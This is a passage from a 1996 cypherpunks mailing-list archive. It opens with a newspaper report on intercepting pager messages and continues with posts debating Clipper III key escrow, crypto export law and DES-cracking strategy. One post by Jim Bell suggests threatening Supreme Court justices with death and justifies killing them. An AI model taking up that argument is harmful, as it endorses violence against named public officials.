 available on the Internet for as little as £200. Further investigations
 by the Telegraph show that the vulnerability of pagers could expose
 nearly a million users to blackmail over sexual liaisons, for example,
 as well as robbery, commercial espionage and terrorist attack.

 The
 Blair messages were almost certainly sent to Alastair Campbell, his
 press secretary, and Tim Allan, Campbell's deputy. Many of them give a
 fascinating insight into how Mr Blair and the spin doctors who surround
 him make determined efforts to present Labour favourably in the
 media.

 The intercepts for Sept 14 show how the Labour leader's
 office was bombarded with anxious messages about a front page report in
 the Sunday Times newspaper headlined: "Blair aide tells Labour to
 forget about socialism".

 The transcripts also show how Peter
 Mandelson, one of Mr Blair's closest aides, closely monitors BBC news
 reports. On Sept 16 he sent a message to the leader's office saying
 that a report by one of the BBC's political correspondents, Jon Sopel,
 referred strongly to the strained links between the Labour leadership
 and the unions which had dominated the previous week's TUC
 conference.

 After Mr Blair made a speech to the City of London, a
 message from Hilary Coffman, one of his press aides, anticipated the
 reaction of the newspapers, saying that most papers, except the
 Telegraph and Independent had reported favourably. In fact, the
 Telegraph's headline on the story was: "Blair's
 good times pledge" above a story saying that he was committed to
 rising living standards and prosperity.

 One of the most intriguing
 messages Campbell received from Jonathan Powell, Mr Blair's chief of
 staff, said: "Pls call when you and TB are free. I have a message from
 Mrs T. - Jonathan." Jonathan Powell is the younger brother of Sir
 Charles Powell, who was Lady Thatcher's private secretary at 10 Downing
 Street.

 <blockquote><h4>Scotland Yard said this was the first time
 it had heard that pager messages could be
 intercepted</h4></blockquote>

 Around the time of the call Mr Blair's
office was making a determined effort to scotch reports, allegedly
attributed to Tory spin doctors, that Lady Thatcher found the Labour
leader "creepy". Labour spin doctors were later involved in passing on a
message from Lady Thatcher countering the reports and making clear that
she still "rather admired" Mr Blair's determination to modernise his
party.

 The police, the Home Office and the Department of Trade and
 Industry expressed surprise at the latest telecommunications tapping
 and said that they would investigate if pager-hacking becomes
 widespread.

 "It is an offence under the Wireless Telegraphy and
 Interception of Communications Acts for anyone to receive messages not
 intended for them," a DTI spokesman said. "However, it is not an
 offence to own the equipment, so we need to catch perpetrators in the
 act."

 Scotland Yard said this was the first time it had heard that
 pager messages could be intercepted. The Federation of Communications
 Services has called for the legislation to be changed, making illegal
 the selling or ownership of radio scanners - a market worth an
 estimated £200 million a year to the telecommunications industry.

 An
 investigation published today in What Cellphone explains how hackers
 have used a radio scanner coupled to a cheap electronic decoder and a
 computer running freely available software to receive other people's
 pager messages from anywhere in the country. It is not an offence to
 own either a scanner - they are used by yachtsmen to monitor weather
 forecasts - or the electronic decoder, which is advertised on the
 Internet as a home automation device.

 It is the marrying of radio
 and computer technology that makes pager hacking more of a threat to
 businesses and individuals than eavesdropping on cellphones. If the
 scanner is left connected to a computer, a log of every pager message
 sent by anyone in the country can easily be recorded. This log can then
 be used in a common word processor program and searched for key words,
 such as the names of politicians, celebrities or companies. Details of
 how hackers can send false messages has appeared on the Internet in the
 past few days.

 <blockquote><h4> Other messages seen include
arrangements for sexual liaisons and details of fruit machines that are
malfunctioning</h4></blockquote>

 "Hacking into pagers is very easily
 done by anyone with some DIY experience and potentially much more
 damaging than listening in on cellphone calls," said Bob Tomalski,
 editor of What Cellphone. "With cellphones, hackers have to listen to
 the messages as they happen. With pagers they can record a day's
 messages and search through them later."

 Once a message has been
 linked to a particular caller, the software can be set up to search
 specifically for that pager's identification code, which appears at the
 beginning of each pager message. Retail chains use the pager system to
 send details of each store's takings to head office. Messages seen by
 the Telegraph range from "Yesterday takings £659, see you in pub in 10
 minutes" to the precise breakdown of the sales of a big supermarket
 chain.

 Other messages seen include arrangements for sexual liaisons
 and details of fruit machines that are malfunctioning and paying out
 big amounts in pubs. Of particular concern is the revelation that
 hackers have intercepted passwords used to switch off alarm systems
 sent to security guards via the pager network.

 For years, analogue
 cellphones have been known to be vulnerable, culminating in the
 publication of conversations between members of the Royal Family. 
 But despite
 concerns about the vulnerability of mobile phones, little attention has
 been paid to pagers, which are much easier to tap.

 Mobile telephones
 use several thousand radio frequencies and have a limited range, so the
 eavesdropper must be near the cellphone receiving the call and have
 technical knowledge to track the call. Pagers by contrast, receive
 easily decoded analogue signals based on 25-year-old technology and
 transmitted on only 10 - published - frequencies.

 Because the
 networks do not know where each pager is located, each message is
 beamed across the country, so that a hacker can receive messages
 destined for any of the 900,000 pager users from Penzance to
 Aberdeen.


-- 
Nicolas Hammond                                 NJH Security Consulting, Inc.
njhm@njh.com                                    211 East Wesley Road
404 262 1633                                    Atlanta
404 812 1984 (Fax)                              GA 30305-3774




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 4 Oct 1996 06:49:24 +0800
To: cypherpunks@toad.com
Subject: The New GAK-Clipper Thing will Fail
Message-ID: <v03007804ae79b86b481c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Comparing the latest GAK/Clipper III (or is it Clipper IV?) thing to the
original Clipper announcement in April 1993, I sense a lot more confusion,
a lot more thorny issues, and a lot more vagueness. They just seem more
disorganized and less committed than the last time around. Each iteration
of Clipper gets less focussed and seems to last a shorter time before the
next version is being talked about. A good thing, of course.

Some random points:

* Unlike with Clipper, where a specification existed and was available
within a few weeks for analysis, and where hardware existed (the Mykotronx
chips, the AT&T phone), what has been publically presented so far is just a
vague commitment to participate.

* There seem to be many ways around the new GAK:

--superencryption is essentially impossible to stop (e.g., use PGP on text
messages, then use the officially-approved GAK--how could this be outlawed?)

--the large pool of _existing_ crypto products means people will be using
these products for years to come (possibly within GAK wrappers, as just
noted)...unless the New World Order (tm) somehow locates, seizes, or
otherwise makes criminals out of those who use a once-legal product, how
could this be stopped?

--the "degrees of freedom" for messages have sharply increased in the last
several years: messages inside Web accesses, messages "sent" by posting to
message pools (*), direct phone calls, the Net, etc.

(* Will posting encrypted messages to the Usenet or world-readable Web
sites become a crime? Or will attempts be made to limit distribution of
Usenet and access to Web sites? Neither of these seems feasible, but how
else could the stated goals of the Administration ("stopping terrorists,
etc. from conspiring") be stopped?)

(On this point above, yes, I know that there has been no talk of
illegalizing the sending of mere encrypted data, only the export of
non-GAKked programs. But I think it likely that the LEAs will realize that
"criminals" are still conspiring with crypto. One thing they may try is to
require that any communication with a non-U.S. site involve GAK. This then
raises the Usenet/message pool directly. Since such sites have
world-distribution, currently, posting encrypted messages to
alt.anonymous.messages or to a mailing list like this necessarily involves
export of the messages. It gets complicated to enforce, naturally.)

* The Cabal itself seems confused as to what's involved. They seem to be
counting on IBM and/or TIS to deliver the solution, and may be just signed
on for what they think are reasons of political expediency.

* As the IBM scheme gets attacked (in the way Matt Blaze attacked Tessera),
as questions are raised about the Key Authorities and their cooperation,
and as the _costs_ are revealed....well, I expect further crumbling.

(On the "costs" issue, running these Key Authorities, staffing them,
complying with subpoenas (and who will _fight_ the subpoenas?), etc., will
not be cheap. For software products like Navigator and Explorer, that are
either free or very cheap, just who will pay for this infrastructure?
Someone at the EPIC Pro-CODE conference in Palo Alto a few months ago--I
forget whom--presented calculations of just how expensive a "key recovery"
infrastructure could be. Will it cost $50 to send a message to a foreign
site? Better to use message pools! :-})

I apologize for the random nature of my comments here. I just see so many
points of attack, so many ways to skirt the intentions of GAK, and so much
ambivalent commentary from the companies involved, that I am convinced this
whole thing will crumble.

Unless a "major terrorist incident" galvanizes the effort, it looks to
start falling apart almost immediately under the onslaught of Cypherpunks,
hackers, other governments (think France wants the USG having access to
their traffic?), and the "crypto anarchy" of nations whose borders are not
even speed bumps.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Osborne <osborne@gateway.grumman.com>
Date: Fri, 4 Oct 1996 04:05:28 +0800
To: Remo Pini <cypherpunks@toad.com
Subject: Re: crypto cd once more
Message-ID: <3.0b19.32.19961003111415.006a72d8@gateway.grumman.com>
MIME-Version: 1.0
Content-Type: text/plain


>Questions are:
>1) is there a system that can handle unix, windows and mac filenames
>   (long ones!)?
>2) if not, is zip-support given on mac and unix systems?
>3) does anyone have suggestions on how to deal with the problem?

I have a CDR sitting right next to me and this is how it handles your
questions:
1) This CDR can burn in 4 modes: 
  1. ISO xxxx compliant (without trailing version numbers on filenames),
  2. strict DOS 8.3,
  3. Joliet (DOS 8.3 & Win95 up to 63 chars),
  4. Romeo (strict Win95 up to 128 chars).
According to the help, option 1 is made to be at least Mac readable.  It
doesn't mention UNIX, though.
2) Yes.
3) No problem: use this CDR.

If you want info on the particular CDR, email me personally.


Rick Osborne    Overall Internet Stud      osborne@gateway.grumman.com
======================================================================
'Zog?  What do you mean zog? Zog what? Zog yes, Zog no?'





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: romana@glamazon.com (Romana Machado)
Date: Fri, 4 Oct 1996 09:41:10 +0800
To: cypherpunks@toad.com
Subject: EzStego in Java!: Now Disappearing At A Site Near You
Message-ID: <v02110101ae79b4eeb624@[206.184.133.208]>
MIME-Version: 1.0
Content-Type: text/plain


EzStego, my tool for "steganography made easy", now has its own web site at
http://www.fqa.com/ezstego/

EzStego is currently alpha software. Use it at your own risk. It is a
reimplementation in Java, with much improvement, of my notorious shareware
product, Stego. EzStego is also shareware. I have made the source code
available for peer review and verification.

EzStego and EzSteggy are (C) Romana Machado 1996. All rights reserved.



Romana Machado romana@fqa.com
http://www.fqa.com/romana/ http://www.glamazon.com/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 4 Oct 1996 06:42:07 +0800
To: interesting-people@eff.org (for publication Dave!)
Subject: How to Compete under Clipper-3
Message-ID: <199610031836.LAA22062@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> * Even if some industry participants fall for it, the majority will not.
>   The "deal" is simply not any good for anyone but the Administration.
>   Expect the same opposition to Clipper III as we saw with Clipper I and II.

The difference is that some weak companies will decide to fall for it.
These companies may think that two years of 56-bit un-escrowed
products (with promises of key escrow in future releases) will be
competitive against 40-bit un-escrowed products.  They're right, but
that's not the competition they will be facing.

The right competitive strategy is to build strong crypto using 168-bit
Triple-DES, in a country that has a sane government and a respect for
privacy.  Such products would sell well against 56-bit products or
key-escrowed products produced by the weak companies that tried to
lean on the government for a competitive edge.

If the US government ends up ever imposing import restrictions on
crypto, it will be completely clear to everyone that their goal all
along has been to restrict the availability of privacy to AMERICANS.
The export laws, their continual announcements that "Americans are
free to use any crypto they want", and all their preaching about
impacts on foreign intelligence would be known as an obvious sham all
along.

Import restrictions would not be any more Constitutional than export
restrictions.  The Constitutional right to receive information (in the
form of source code) from outside the US will enable companies to
bypass any import restrictions that survive Constitutional scrutiny.
They can do their crypto development in a free country, ship binaries
to most of the world from there, ship source code to the United
States, and compile that source code to binaries for local US
distribution.  None of these actions will violate any US export or
import controls that can be Constitutionally imposed.  Such
development can be done in dozens of countries.  Some countries who
aren't afraid of their citizens having privacy will find it
economically advantageous to remain free, despite US pressure to
suppress privacy.  A small industry of good cryptographers will grow
into a large industry there, as the US pressures the rest of the world
to become less free.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Fri, 4 Oct 1996 03:55:57 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: RE: The Right to Keep and Bear Crypto
Message-ID: <n1367779560.35309@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


[Assumptions: Crypto is arms.  We have the right to bear arms. 
 Therefore: We have the right to bear crypto.]

Following along with the news stories, it would seem the USG doesn't disagree
with this logic.  What they are attempting to do is limit world distribution,
*not* internal distribution.  Even with the new key recovery idea, crypto
which remains in the US will continue to be unregulated. 

   Another fear is that the administration is using export 
   limits to control domestic use of encryption. While Gore 
   directly stated yesterday that domestic use of encryption 
   will remain unregulated, the double standard for domestic 
   ^^^^^^^^^^^^^^^^^^^^^^^
   and international products might discourage U.S. 
   companies from developing two different versions, leaving 
   U.S. and Canadian customers with the same products that 
   the federal government has deemed safe to ship overseas.  
                      [_GAK_Rat_Pack_, John Young, 3 Oct 96]

This may (will?) limit the products which are produced by large corporations,
as their need for a single, globally distributable product is respected.
However, smaller companies who have neither the desire nor finances to
distribute their product on a global scale will be unaffected.  Shareware/
freeware products will also be unaffected (unless someone from another
country pulls it off a website, or similar means).

However, all of this is irrelevant, because I must say, Tim May has the
proper idea -- We may have the right to bear crypto, but the government
has the right to limit the types/amounts of crypto we bear.
 
** Success in this matter is classifying crypto as speech **

I read somewhere (probably here) about a case which was (was destined??) to
be a precedent for crypto as speech.  All I can remember was something about
the code being classified as speech, or something like that.  Sorry I can't
quite remember what it was.  Anyone have any suggestions/references?

Patrick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scallon@kiwi.pyrotechnics.com
Date: Fri, 4 Oct 1996 05:06:16 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk forgery.
Message-ID: <19961003164259.20019.qmail@kiwi.pyrotechnics.com>
MIME-Version: 1.0
Content-Type: text


I just got word from one of my buddies that someone has been forging
my e-mail to cypherpunks talking about the pederast organization
NAMBLA.  The guys at Penn State where the forgery came from have
started to investigate and will bring the perpetrators to a discip-
linary hearing.

Thank you for your co-operation.

BTW:  Below is my real .Sig

-- 
Brendan John Francis Scallon    When it comes to the net, I'm
scallon@pyrotechnics.com     similar to the thrilla in Manila
DROP Squad - Pali-town   http://www.pyrotechnics.com/~scallon
GEORGE CLINTON for PREZ                  This country needs a
BOOTSY COLLINS for VP              Parliament, not a Congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 07:57:44 +0800
To: "Mullen Patrick" <cypherpunks@toad.com>
Subject: RE: The Right to Keep and Bear Crypto
Message-ID: <199610031845.LAA01932@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 AM 10/3/96 -0400, Mullen Patrick wrote:

>This may (will?) limit the products which are produced by large corporations,
>as their need for a single, globally distributable product is respected.
>However, smaller companies who have neither the desire nor finances to
>distribute their product on a global scale will be unaffected.  Shareware/
>freeware products will also be unaffected (unless someone from another
>country pulls it off a website, or similar means).
>
>However, all of this is irrelevant, because I must say, Tim May has the
>proper idea -- We may have the right to bear crypto, but the government
>has the right to limit the types/amounts of crypto we bear.
> 
>** Success in this matter is classifying crypto as speech **
>Patrick


While I agree we shouldn't push the crypto/arms connection, on the other 
hand I think we can push BACK:  If the government tries to equate crypto 
with arms,take the position that while we disagree with this equation, to 
the extent the government is using it, it must take the good with the bad 
and accept the "keep and bear arms" interpretation literally.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 4 Oct 1996 05:22:12 +0800
To: Jim McCoy <mccoy@communities.com>
Subject: Re: Fighting Clipper III
In-Reply-To: <v03007802ae791065bbd7@[205.162.51.35]>
Message-ID: <9610031655.AA00896@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Jim McCoy writes:
>  The big brother inside stickers from the last campaign were
>  nice, maybe people can come up with variations of various
>  corporate logos or marketting phrases which help get the
>  message across?

Big Brother Inside stickers are a classic and should be revived.  I would  
like to see a takeoff of the IBM logo since they are the ones who seem to be  
cozying up to the USG the most (with the exception of TIS whom nobody has ever  
heard of).   How about "GAK" in the familiar IBM blue pinstripe logo?  Or  
"IBBM"  International Big Brother Machines?  Everyone recognizes the IBM logo.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Fri, 4 Oct 1996 07:21:55 +0800
To: cypherpunks@toad.com
Subject: Clipper spin [was Re:Flood Warning]
In-Reply-To: <199610031447.OAA03009@pipe2.ny1.usa.pipeline.com>
Message-ID: <v03007803ae79cac1ff80@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


[...]
>
>   High-Tech Leaders Join Forces to Enable International
>   Strong Encryption
>
>      See: http://www.ibm.com/news/alliance2.htm

The "International Strong Encryption" phrase is something that we
need to become active in stopping.  Anything which responds to such
announcements should put a different spin on this phrase.  If the
Clipper farce is accepted as "strong" encryption then the battle is
lost; maybe something like "it is _international_ strong encryption
because it is the strongest encryption people like Saddam Hussein [insert
bogeyman du jour] want Americans to have access to"

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Fri, 4 Oct 1996 07:23:04 +0800
To: cypherpunks@toad.com
Subject: Re: Fighting Clipper III
In-Reply-To: <v03007802ae791065bbd7@[205.162.51.35]>
Message-ID: <v03007804ae79cbf6480a@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



Declan McCullagh <declan@eff.org> writes:
>You'll have trouble doing a successful boycott of RSA. What, you won't
>use Netscape Navigator or PGP?

Actually RSA is not a hard target for people like us to threaten.  The
Diffie-Hellman patent expires in 210 days.  Cylink is prevented from taking
legal action against anyone for violating this patent while the current
lawsuit is being decided.  When Diffie-Hellman expires ElGamal is available
for use for free.  So the best threat one can make against RSA is to directly
challenge their revenue stream: start working on making ElGamal an available
option in all systems which use RSA.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 10:30:54 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: The Right to Keep and Bear Crypto
Message-ID: <199610032012.NAA07518@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:09 AM 10/3/96 -0700, Bill Stewart wrote:
>At 08:29 PM 10/2/96 -0700, azur@netcom.com (Steve Schear) wrote:
>>Unless we get the strong support of the gun lobby and NRA.
>
>The gun lobby and NRA are generally against handgun registration,
>but haven't stopped it.  We're against crypto key registration.
>The gun lobby and NRA are generally against machine gun licensing requirements,
>but haven't stopped it.  We're against strong crypto licensing requirements.
>The gun lobby and NRA are generally against firearms dealers' licensing,
>but haven't stopped it.  We're against crypto dealers' licensing.
>The gun lobby and NRA are generally against assault weapon import laws,
>but haven't stopped them.  We're against strong crypto import laws.

If the wimps at the NRA had any guts, they  would poll their membership, 
asking if anybody would be willing to make "the sacrifice" (presumably due 
to a recent terminal illness diagnosis).  Then, they'd get on the phone to 
the Supreme Court, and point out that they'd just noticed that Supreme Court 
appoints were ONLY "good for life" and suggest nicely that if all of the 
above outrages (WRT guns) weren't reversed within the year, they predict 
about nine open seats shortly thereafter.

Okay, maybe it's only wishful thinking, but...

If you take the position that all human life is equally valuable, then you 
must concede that the deaths of nine fools is no worse than the deaths of 
nine randomly-selected individuals who found themselves the victim of gun laws.

Crypto relevancy?  Well, the so-called "gun nuts" have already tolerated far 
more regulation and restriction of guns than we should ever accept.  But if 
we use their tactics, can we expect any better results?



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 4 Oct 1996 09:47:31 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Fighting Clipper III
In-Reply-To: <v03007801ae79afc6404c@[207.167.93.63]>
Message-ID: <Pine.3.89.9610031350.A13226-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 3 Oct 1996, Timothy C. May wrote:
> I think we should support Microsoft and Netscape in their nonparticipation
> in the Cabal. Sometimes being an 800-pound gorilla has its advantages.

Indeed we do need to support Netscape and <sigh> Microsoft as long as 
they oppose GAK.

--Lucky, who meant to buy a new PowerBook 5300 for his girlfriend this 
week and who now will get her a Win95 machine because of Apple's support for 
GAK. I'm glad I didn't buy it yet. Apple, are you listening?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 4 Oct 1996 05:54:16 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Clipper III on the table
In-Reply-To: <v03007813ae77351a2b54@[206.119.69.46]>
Message-ID: <v03007818ae79a56fae08@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:19 am -0400 10/3/96, snow wrote:
> >        Wake up, America!
> > He won't love you in the morning.
>
>      Where could one aquire this bumpersticker?

A lot of people have asked me this. :-).

Just send me e-mail, and I'll forward it on to my brother, who had them
printed up. He gave the first few away, but the postage on the tube he sent
mine to me in was $3.00, ('course he sent it to me priority mail...), so
he's not going to do that for long if I choke his mailbox...

Anyway, pricing the things so he doesn't lose money's his problem, I
suppose. :-)

Just send me a message saying you want one, and I'll pass it along.


Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Fri, 4 Oct 1996 06:40:40 +0800
To: attila@primenet.com
Subject: Re: support for "crack DES"
Message-ID: <199610031820.NAA22583@bigeasy.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain



>         NetScape might not hawg the glory, but Bully Billy will trumpet
>     to the world that HE devised the means, HE directed the breakers,
>     and MicroSlop is the "benevolent" [read greedy, vicious, corrupt, 
>     threatening predator] organization which "pulled freedom loving
>     Americans clear from the *very* mouth the the beast."  

Considering the situation -- considering that RSA has even signed on 
to this scheme -- I'd have to say that I don't give a rat's ass what 
Bill Gates claims.  If Micro$oft bucks the system, I'll gladly 
applaud their stand.  
        
The situation is not good at all.

Cracking DES (whether distributed or through a hardware crack, or 
both!) seems critical at this point.

me
 
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 4 Oct 1996 06:25:35 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: The Right to Keep and Bear Crypto
In-Reply-To: <v02130500ae78384961a4@[10.0.2.15]>
Message-ID: <Pine.SUN.3.95.961003135932.764I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


No. And No.  This argument will never fly in any court.

If you want to see why, go to my homepage

http://www.law.miami.edu/~froomkin

and search for the (fictional!)  "really pro-Clipper court decision". 
Then find the section trashing this argument.  (sorry I can't give a
better pointer but I'm not at work today). 

On Wed, 2 Oct 1996, Steve Schear wrote:

> A well-regulated Militia, being necessary to the security of a free
State,
> the right of the people
>  to keep and bear Arms, shall not be infringed.
>                                  --Constitution of the United States of America,
>                                  Amendment II, 1791
> 
> I'm not a consitiutional scholar, but it seems to me that since the
> government has already classed crypto as arms via ITAR and since the I am
> guaranteed the right to bear arms I choose to bear the crypto of my choice
> as part of my arsonal.
> 
[etc.]

**Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"**
                  **Age two weeks: 9 lbs 12 oz, 23"**
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 4 Oct 1996 06:24:28 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: Fw: Re: ITAR satellite provision
In-Reply-To: <9610030712.AA02002@srzts100.alcatel.ch>
Message-ID: <Pine.SUN.3.95.961003140348.764J-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Alas, a common fallacy.

You have committed a prohibited export when the stuff lands outside the
USA....It's not illegal when it goes up ("by reason of the launching" and,
e.g. *stays up* in orbit)  but it is illegal when it comes down abroad. 


On Thu, 3 Oct 1996, Remo Pini wrote:
> > >*   A launch vehicle or payload shall not, by reason of the launching
> > >*   of such vehicle, be considered an export for purposes of this
> > >*   subchapter.
> > Okay, everybody, call Estes!  We've got some crypto to export...er...laun
> > ch!
> If I get the above wording correctly (unicorn, help me!), it is sufficient 
> to put the cryptostuff on a disc in a LAUNCHABLE device, it never says that 
> the payload has to be delivered by air. So, just put that thing in a bag 
> and get it through customs... (or does "by reason of ..." mean that the 
> exclusive means of export allowed is launching ?)
> 

**Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"**
                  **Age two weeks: 9 lbs 12 oz, 23"**
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 12:45:50 +0800
To: "Michael Froomkin - U.Miami School of Law" <rp@rpini.com>
Subject: Re: Fw: Re: ITAR satellite provision
Message-ID: <199610032109.OAA11555@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:05 PM 10/3/96 -0400, Michael Froomkin - U.Miami School of Law wrote:
>Alas, a common fallacy.
>
>You have committed a prohibited export when the stuff lands outside the
>USA....It's not illegal when it goes up ("by reason of the launching" and,
>e.g. *stays up* in orbit)  but it is illegal when it comes down abroad. 

Sure about that?  The regulation said something like "launch vehicle" or 
"launch," apparently indicating that a "launch vehicle" could actually be 
exported, THEN launched, etc, without violating ITAR.  And since the 
regulation does not go into any detail about the "launch", other than it is 
a "launch" (and does not explicitly prohibit landing subsequent to launch) 
the implication is that there is no prohibition.

I still think the regulation was just written sloppily.   

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scottb@aca.ca
Date: Fri, 4 Oct 1996 06:30:10 +0800
To: <cypherpunks@toad.com>
Subject: chaining remailers
Message-ID: <96Oct3.141143edt.15729@gateway.aca.ca>
MIME-Version: 1.0
Content-Type: text/plain



Can someone point me to where I can get software to take advantage of 
chaining remailers for Windows 95??

Actually, can this be done through a Windows enviroment, or do I need to run 
Linux?

/sb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 4 Oct 1996 08:38:16 +0800
To: cypherpunks@toad.com
Subject: Re: [FACTS] Mountain Meadows Massacre
In-Reply-To: <199610031213.GAA16253@mail.xmission.com>
Message-ID: <oHk9uD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Deana Holmes" <mirele@xmission.com> writes:

<snip mor(m)on propaganda>
> 
> <snip Dmitri Vulis nonsense>

No wonder the criminal cult doesn't want its foul deeds subjected to
public scrutiny by "dead-agenting" its critics. Is Timmy May a
paid cult apologist?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 12:58:04 +0800
To: attila@primenet.com
Subject: Re: support for "crack DES"
Message-ID: <199610032143.OAA13883@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:26 PM 10/3/96 +0000, Omegaman wrote:
>Considering the situation -- considering that RSA has even signed on 
>to this scheme -- I'd have to say that I don't give a rat's ass what 
>Bill Gates claims.  If Micro$oft bucks the system, I'll gladly 
>applaud their stand.  
>        
>The situation is not good at all.
>
>Cracking DES (whether distributed or through a hardware crack, or 
>both!) seems critical at this point.

Just remember that it would be far better to make the crack look easy, than 
to make it look hard.  quantity 9000+, $1,000 Pentiums for a year (plus 
maybe $500,000 in electricity) looks "hard."   1000 dedicated chips (whether 
they be FPGA or custom or...) for 1.5 months or so looks "easy."

The latter crack looks far more likely to be repeated.  The former is 
OBVIOUSLY a stunt.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 4 Oct 1996 03:49:08 +0800
To: cypherpunks@toad.com
Subject: Flood Warning
Message-ID: <199610031447.OAA03009@pipe2.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   BSDI To Share "SYN-Flooding" Protection Software 
       
      This code is freely available via BSDI's Web and FTP  
      sites at www.bsdi.com and ftp.bsdi.com. 
 
 
   TIS will license its encryption key recovery technology 
   to Atalla 
 
      The agreement comes on the heels of two other recent 
      developments: a new Administration policy regarding 
      export controls on strong encryption, and TIS and 
      Atalla's participation in a new computer industry 
      alliance to promote adoption of a worldwide standard 
      for encryption key recovery. 
 
      RecoverKey supports the Administration's new policy by 
      allowing emergency recovery of an encrypted message or 
      file. This technology, patented by TIS and first 
      approved by the U.S. government for export in January 
      1996, is fundamental to approaches now being 
